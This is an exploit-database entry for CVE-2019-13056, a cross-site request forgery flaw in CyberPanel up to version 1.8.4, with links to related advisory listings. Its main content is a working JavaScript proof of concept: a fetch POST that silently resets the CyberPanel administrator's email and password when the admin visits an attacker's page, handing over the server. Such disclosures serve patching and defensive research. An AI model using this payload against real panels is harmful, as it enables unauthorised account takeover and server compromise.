Lucene search
Bilgi Birikim Sistemleri1337DAY-ID-32945HistoryJul 02, 2019 - 12:00 a.m.
CyberPanel 1.8.4 - Cross-Site Request Forgery Vulnerability
2019-07-0200:00:00
Bilgi Birikim Sistemleri
0day.today
89
Exploit for multiple platform in category web applications
# Title: CyberPanel Administrator Account Takeover <= v1.8.4
# Author: Bilgi Birikim Sistemleri
# Vendor Homepage: https://cyberpanel.net/
# Version: Up to v1.8.4.
# CVE: CVE-2019-13056
# [email protected] & bilgibirikim.com
# Description:
# Attacker can edit administrator's credentials like email, password.
# Then, access the administration panel and takeover the server.
# A CSRF vulnerability.
# How to Reproduce:
# Attacker will create a website,
# CyberPanel administrator will visit that website,
# Administrator's e-mail and password will be changed automatically.
# PoC:
<script>
fetch('https://SERVERIP:8090/users/saveModifications', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"accountUsername":"admin","firstName":"CSRF","lastName":"Vulnerable","email":"[email protected]","password":"attackerspassword"}'});
</script>
# 0day.today [2019-07-03] #Related
cvelist
cvelist
CVE-2019-13056
2019-07-02 15:18:53
exploitpack
exploitpack
CyberPanel 1.8.4 - Cross-Site Request Forgery
2019-07-01 00:00:00
exploitdb
exploitdb
CyberPanel 1.8.4 - Cross-Site Request Forgery
2019-07-01 00:00:00
packetstorm
packetstorm
CyberPanel 1.8.4 Cross Site Request Forgery
2019-07-01 00:00:00
cve
cve
CVE-2019-13056
2019-07-02 16:15:12
nvd
nvd
CVE-2019-13056
2019-07-02 16:15:12
prion
prion
Cross site request forgery (csrf)
2019-07-02 16:15:00
Related for 1337DAY-ID-32945